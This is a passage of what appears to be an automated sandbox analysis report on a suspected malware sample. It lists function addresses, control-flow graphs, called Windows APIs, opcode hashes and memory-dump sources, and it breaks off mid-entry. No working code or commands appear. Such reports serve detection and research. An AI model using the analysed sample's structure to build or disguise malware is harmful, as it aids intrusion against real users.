                                                                                                                                                                                                                              • Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ChangeCloseErrorFindLastNotification__dosmaperr
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 490808831-0
                                                                                                                                                                                                                              • Opcode ID: 1075a27ddf30369b5deee0cb8b3ecbf94400a03b09c6828824c0d216b820aa91
                                                                                                                                                                                                                              • Instruction ID: 375721714d43bc4782e6a43c23cd9332c59ec42f2299351a345cb8f3503d09eb
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1075a27ddf30369b5deee0cb8b3ecbf94400a03b09c6828824c0d216b820aa91
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EA014E3360412016D6256635E8457FF67599B82738F2B017FFD188B2D2EB6CDCC2819D
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 1806 419767-41977f call 41e84a 1809 419781-419786 call 412381 1806->1809 1810 419792-4197a8 SetFilePointerEx 1806->1810 1817 41978c-419790 1809->1817 1812 4197b9-4197c3 1810->1812 1813 4197aa-4197b7 GetLastError call 41234b 1810->1813 1816 4197c5-4197da 1812->1816 1812->1817 1813->1817 1818 4197df-4197e4 1816->1818 1817->1818
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • SetFilePointerEx.KERNEL32(00000000,?,00000002,?,00000000,?,?,?,?,?,00419816,?,?,00000002,00000000), ref: 004197A0
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00419816,?,?,00000002,00000000,?,00416146,?,00000000,00000000,00000002,?,?,?,?), ref: 004197AA
                                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 004197B1
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorFileLastPointer__dosmaperr
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2336955059-0
                                                                                                                                                                                                                              • Opcode ID: dad49dafcb6aaf0294d2e2872a6b63d175876bddee0454d410784651848899ac
                                                                                                                                                                                                                              • Instruction ID: ffc3df5eb890e326191760c687c06a6ec256fa7eb9c4ce0b7ceac38b7dc3edc6
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dad49dafcb6aaf0294d2e2872a6b63d175876bddee0454d410784651848899ac
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 70012D36620119ABCB159F59DC059EE7B29DF85330B28024AFC219B2D0E6749C918798
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 1828 4264f9-42650f SysFreeString * 2 CoUninitialize
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FreeString$Uninitialize
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1985688103-0
                                                                                                                                                                                                                              • Opcode ID: 08deaeae2dcb7a0c46a1906be4fa29c42c893604feb1bbad5e888a8e6db489b5
                                                                                                                                                                                                                              • Instruction ID: 20283bebf02f6add892787a5acbccff6c180d450b55e9b59979360a618d6bcd4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 08deaeae2dcb7a0c46a1906be4fa29c42c893604feb1bbad5e888a8e6db489b5
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A6B09230D02029ABEF22AB62EE0D45C7F32FF40350F410061F405332308B351D22EE88
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 1829 419cc3-419ced 1830 419cf6-419d00 1829->1830 1831 419cef-419cf1 1829->1831 1833 419d02-419d11 call 413b67 1830->1833 1834 419d27-419d33 1830->1834 1832 419dc3-419dc8 1831->1832 1846 419f05-419f34 call 410932 CreateFileW 1833->1846 1847 419d17-419d1f 1833->1847 1836 419d35-419d3a 1834->1836 1837 419d7a 1834->1837 1840 419d68-419d73 1836->1840 1841 419d3c-419d41 1836->1841 1838 419d7c-419d82 1837->1838 1844 419dc0 1838->1844 1845 419d84-419d88 1838->1845 1840->1838 1843 419d75-419d78 1840->1843 1841->1840 1842 419d43-419d48 1841->1842 1842->1843 1848 419d4a-419d4f 1842->1848 1843->1838 1850 419dc2 1844->1850 1845->1844 1851 419d8a-419d9d 1845->1851 1852 419d21 1847->1852 1853 419d64-419d66 1847->1853 1848->1843 1854 419d51-419d56 1848->1854 1850->1832 1856 419daa-419daf 1851->1856 1857 419d9f-419da4 1851->1857 1852->1834 1853->1834 1858 419d58-419d5d 1854->1858 1859 419d5f-419d62 1854->1859 1856->1844 1863 419db1-419db4 1856->1863 1861 419da6-419da8 1857->1861 1862 419e08-419e20 call 4192ad 1857->1862 1858->1838 1858->1859 1859->1838 1861->1844 1861->1856 1871 419e22-419e29 1862->1871 1872 419e2b-419e2e 1862->1872 1864 419db6-419db9 1863->1864 1865 419dfd-419dff 1863->1865 1868 419dc9-419dda call 419800 1864->1868 1869 419dbb-419dbe 1864->1869 1870 419e00-419e02 1865->1870 1878 419eab-419eb6 1868->1878 1881 419de0-419df3 call 419800 1868->1881 1869->1844 1869->1865 1870->1862 1874 419ea3-419ea5 1870->1874 1871->1872 1875 419e60-419e67 call 412381 1872->1875 1876 419e30-419e36 1872->1876 1874->1844 1874->1878 1875->1850 1879 419e49-419e53 1876->1879 1880 419e38-419e3b 1876->1880 1882 419ec9-419ed2 1878->1882 1883 419eb8-419ebb 1878->1883 1887 419e55-419e5a call 412381 1879->1887 1888 419e6c-419e71 1879->1888 1885 419e3d-419e42 1880->1885 1886 419e8e-419ea1 call 419800 1880->1886 1881->1875 1902 419df5-419dfb 1881->1902 1890 419ed3-419ed5 1882->1890 1883->1890 1891 419ebd-419ec7 1883->1891 1885->1879 1894 419e44-419e47 1885->1894 1886->1874 1886->1875 1887->1875 1888->1886 1898 419e73-419e87 call 419800 1888->1898 1890->1844 1897 419edb-419ef4 call 415fa3 1890->1897 1891->1897 1894->1874 1897->1875 1907 419efa-419efe 1897->1907 1898->1875 1906 419e89-419e8c 1898->1906 1902->1870 1906->1874 1907->1897 1908 419f00 1907->1908 1908->1844
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00419F2D
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateFile
                                                                                                                                                                                                                              • String ID: @
                                                                                                                                                                                                                              • API String ID: 823142352-2766056989
                                                                                                                                                                                                                              • Opcode ID: 19ae29186eb238c1cffb342219aeaf7137875d95b9a5eb57b690caaf41f6485a
                                                                                                                                                                                                                              • Instruction ID: 6e2d9e324c610adb1979779f65b1bd98f37231a06814a81205b09b8777469d26
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 19ae29186eb238c1cffb342219aeaf7137875d95b9a5eb57b690caaf41f6485a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4D61E671900209AAEF259E28ECA1BFF3659DB01324F280667F914D63E1D37DCDD1C299
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 1909 401bb2-401c21 call 42780c call 40307c call 402fe5 call 402f6b 1918 401c51-401c61 1909->1918 1919 401c23-401c47 1909->1919 1919->1918 1920 401c49-401c4c call 40187f 1919->1920 1920->1918
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __EH_prolog.LIBCMT ref: 00401BB7
                                                                                                                                                                                                                                • Part of subcall function 0040307C: __EH_prolog.LIBCMT ref: 00403081
                                                                                                                                                                                                                                • Part of subcall function 00402FE5: __EH_prolog.LIBCMT ref: 00402FEA
                                                                                                                                                                                                                                • Part of subcall function 00402FE5: std::locale::_Init.LIBCPMT ref: 0040300E
                                                                                                                                                                                                                                • Part of subcall function 00402F6B: __EH_prolog.LIBCMT ref: 00402F70
                                                                                                                                                                                                                                • Part of subcall function 0040187F: __CxxThrowException@8.LIBVCRUNTIME ref: 004018C9
                                                                                                                                                                                                                                • Part of subcall function 0040187F: std::system_error::system_error.LIBCPMT ref: 004018D8
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: H_prolog$Exception@8InitThrowstd::locale::_std::system_error::system_error
                                                                                                                                                                                                                              • String ID: v*@
                                                                                                                                                                                                                              • API String ID: 3966877926-3062513736
                                                                                                                                                                                                                              • Opcode ID: 497657be53033261b67b0434a3cc26887958964f1d250a566e7946ea216817f5
                                                                                                                                                                                                                              • Instruction ID: cee5f8951f4aa60660b8f0772aceb561b5f660f34992c4678438f01180239965
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 497657be53033261b67b0434a3cc26887958964f1d250a566e7946ea216817f5
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FC218EB1611106AFD708DF59C849A6AB7F9FF48348F14822EE116A7341C7B8DD008BA4
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __EH_prolog.LIBCMT ref: 0042604F
                                                                                                                                                                                                                                • Part of subcall function 00401BB2: __EH_prolog.LIBCMT ref: 00401BB7
                                                                                                                                                                                                                                • Part of subcall function 00402403: __EH_prolog.LIBCMT ref: 00402408
                                                                                                                                                                                                                              • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00426131
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: H_prolog$Ios_base_dtorstd::ios_base::_
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 420165198-0
                                                                                                                                                                                                                              • Opcode ID: 2ccafb23c208dd6e33c94c9fad69460fbbd1af4e4676f70a9cd624bb09d9f0ce
                                                                                                                                                                                                                              • Instruction ID: 115bff912634c1bae9a386948b342ebf01da51d0a41a8c3d45e1fed53d0017c0
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2ccafb23c208dd6e33c94c9fad69460fbbd1af4e4676f70a9cd624bb09d9f0ce
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3531F770D01119EBDB14EF95E985AEDFBB4FF48304F1081AEE405B3681DB786A04CB64
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • SetErrorMode.KERNEL32(00000400,?,?,03150223,?,?), ref: 03150E19
                                                                                                                                                                                                                              • SetErrorMode.KERNEL32(00000000,?,?,03150223,?,?), ref: 03150E1E
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorMode
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2340568224-0
                                                                                                                                                                                                                              • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                              • Instruction ID: 0d1c95f19022a271675dd382654040f4dee6c313f8bb3bc0b0dee7df5a06c074
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8BD01231145128B7D7002BD4DC09BCDBB1CDF09B62F148011FB0DD9080C770954046E5
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • std::regex_error::regex_error.LIBCPMT ref: 004081A4
                                                                                                                                                                                                                                • Part of subcall function 00408040: std::exception::exception.LIBCONCRT ref: 00408058
                                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 004081B2
                                                                                                                                                                                                                                • Part of subcall function 0040ABCB: KiUserExceptionDispatcher.NTDLL(?,?,?,0040996C,?,?,?,?,?,?,?,?,0040996C,?,00438A4C), ref: 0040AC2B
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: DispatcherExceptionException@8ThrowUserstd::exception::exceptionstd::regex_error::regex_error
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 964721716-0
                                                                                                                                                                                                                              • Opcode ID: d62da80a3684c30e6ad3ebe5b93b082f3a99603087db647614469e16434a24a4
                                                                                                                                                                                                                              • Instruction ID: a76997e87f68b3a191f62a2152014b4e80abd2d03d6f885f9787d4c28a8fe2d8
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d62da80a3684c30e6ad3ebe5b93b082f3a99603087db647614469e16434a24a4
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6CC0127045020C66CB00F6A5CC46DBE763CA908200F40082E762021082AA38A118465A
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 89ee0429e7c3b78fee215e5908ca075a1a99ef19cdf9331575feb5a3c314da26
                                                                                                                                                                                                                              • Instruction ID: 7f647bd7b68c58480356602612fa02c60fce203f31c4afd0b56fb408a9d690c1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 89ee0429e7c3b78fee215e5908ca075a1a99ef19cdf9331575feb5a3c314da26
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2851F771A00108AFDB10DF69C840BFA7BA5EF85364F59815EE8489B392CB39DD82C795
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: __fread_nolock
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2638373210-0
                                                                                                                                                                                                                              • Opcode ID: dd9259938b701549e3a1f201eff00eebe2623ef1ec68c3af772c7781cc5ab522
                                                                                                                                                                                                                              • Instruction ID: 92d79e160b507baa56e58511ea190f57013b3733b8d645c4d1d18e9f5b661b4d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dd9259938b701549e3a1f201eff00eebe2623ef1ec68c3af772c7781cc5ab522
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EA317C31604706AFD710DE29C884A5ABBA0BF88354F04863FFD54A73A1D779D854CB9A
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __EH_prolog.LIBCMT ref: 004024A6
                                                                                                                                                                                                                                • Part of subcall function 0040187F: __CxxThrowException@8.LIBVCRUNTIME ref: 004018C9
                                                                                                                                                                                                                                • Part of subcall function 0040187F: std::system_error::system_error.LIBCPMT ref: 004018D8
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Exception@8H_prologThrowstd::system_error::system_error
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 938716162-0
                                                                                                                                                                                                                              • Opcode ID: 0aad76d9ccdb38fc9716b0bd4f4ae1cc67668907333425d6879ac6c1d34db6e1
                                                                                                                                                                                                                              • Instruction ID: 74f8325a11d62ea13fad7549c786a5ed5267532987f834d27d08a699b4d18117
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0aad76d9ccdb38fc9716b0bd4f4ae1cc67668907333425d6879ac6c1d34db6e1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C3318B71A00505AFCB18DF29C9D5EAAB7F5FF84318718C16EE416AB791C634EC00CB54
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __EH_prolog.LIBCMT ref: 00402581
                                                                                                                                                                                                                                • Part of subcall function 00402B06: __EH_prolog.LIBCMT ref: 00402B0B
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: H_prolog
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3519838083-0
                                                                                                                                                                                                                              • Opcode ID: cdffe7d94a9ad02bd4029dc2a0349a1809f7134020811f9c5978122157e34323
                                                                                                                                                                                                                              • Instruction ID: 2a6667c304d01eacddf9d20035e77db0555498f4c479ac31cd54c3f05400b439
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cdffe7d94a9ad02bd4029dc2a0349a1809f7134020811f9c5978122157e34323
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D9319870A00615AFCB15DF09CA84A9EBBB1FF48314F14856EE415AB791C7B9ED40CB94
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __EH_prolog.LIBCMT ref: 00402408
                                                                                                                                                                                                                                • Part of subcall function 00402B06: __EH_prolog.LIBCMT ref: 00402B0B
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: H_prolog
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3519838083-0
                                                                                                                                                                                                                              • Opcode ID: 7ccbf68215674326e846e9e31825d79c5c502473ac86993a1b2e229bddcf8f14
                                                                                                                                                                                                                              • Instruction ID: acc1f40cfc044376a2f11a90f6c11c43800a5431404741bf8f8bd34e997dcd85
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7ccbf68215674326e846e9e31825d79c5c502473ac86993a1b2e229bddcf8f14
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0F218E70601611DFC728DF15C54896ABBF5FF88314B10C26DE85A9B7A1C770EE41CB90
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: __wsopen_s
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3347428461-0
                                                                                                                                                                                                                              • Opcode ID: 77aa99f2f88df8cd4d36c2d0dc9640374021eb40fe0889f8d183050a52ea336c
                                                                                                                                                                                                                              • Instruction ID: 1154e27c015a897812a0a5709c6716ad0e12ceb5b9437c51957f638709d22443
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 77aa99f2f88df8cd4d36c2d0dc9640374021eb40fe0889f8d183050a52ea336c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 68114C71904209AFCF05DF58E9419DB7BF4EF48314F10409AF808AB311D631D9618BAA
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 701e18208b567a6bb177b1ccb661cbfd4effab1e33f914200ccb643209a10c45
                                                                                                                                                                                                                              • Instruction ID: bb13e13d757cd37dfe0a4f239b5d8845d05e4a8eb61872b1cde1787caac163ea
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 701e18208b567a6bb177b1ccb661cbfd4effab1e33f914200ccb643209a10c45
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E4F0F93254061496D6213A6B9C0579B32AC9F92339F114BBFFC30A61C2CA7CE95246AE
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __EH_prolog.LIBCMT ref: 00402F70
                                                                                                                                                                                                                                • Part of subcall function 004035F5: __EH_prolog.LIBCMT ref: 004035FA
                                                                                                                                                                                                                                • Part of subcall function 004035F5: std::_Lockit::_Lockit.LIBCPMT ref: 00403609
                                                                                                                                                                                                                                • Part of subcall function 004035F5: int.LIBCPMT ref: 00403620
                                                                                                                                                                                                                                • Part of subcall function 004035F5: std::locale::_Getfacet.LIBCPMT ref: 00403629
                                                                                                                                                                                                                                • Part of subcall function 004035F5: std::_Lockit::~_Lockit.LIBCPMT ref: 00403670
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: H_prologLockitstd::_$GetfacetLockit::_Lockit::~_std::locale::_
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3585332825-0
                                                                                                                                                                                                                              • Opcode ID: 6af91489f422ab2b9346da6299f13020bb6ba693aa2f45747282a65afbb3964b
                                                                                                                                                                                                                              • Instruction ID: 08e3709e77e7d1eb8e6a734fcd7c8cb2ed90b0a3f4c6ef6dd5fb35cf0d7a5197
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6af91489f422ab2b9346da6299f13020bb6ba693aa2f45747282a65afbb3964b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 80018F70A10114AFDB14EB25DA4ABAE77F9AF04708F00403EF405B76D1DBF8AE008B58
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 269201875-0
                                                                                                                                                                                                                              • Opcode ID: 68fd172b046a401a07b87b6cc8e6e0eb4e84c281b2bbab5ff70b0aff8b290acd
                                                                                                                                                                                                                              • Instruction ID: 12cd10f48dc7b96564373969defca7bad1702ec24c59837b56aad39c86ff4cfc
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 68fd172b046a401a07b87b6cc8e6e0eb4e84c281b2bbab5ff70b0aff8b290acd
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AFF09A32511119BBCF005E96DC02CDA3B6EEF89334F100156F91492150DA3ADD60A7A5
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B3A4,00000000,?,00410DD1,?,00000008,?,0041197C,?,?,?), ref: 00417A77
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                                                                              • Opcode ID: b75641747b422377c90d67b6dee4493775f18ffac96cc9d64fbbcf0dcb9ea88a
                                                                                                                                                                                                                              • Instruction ID: 1d8c2cfb616aaf75abf93827710d27348e1db2613881ba842acdabaabffa5ab7
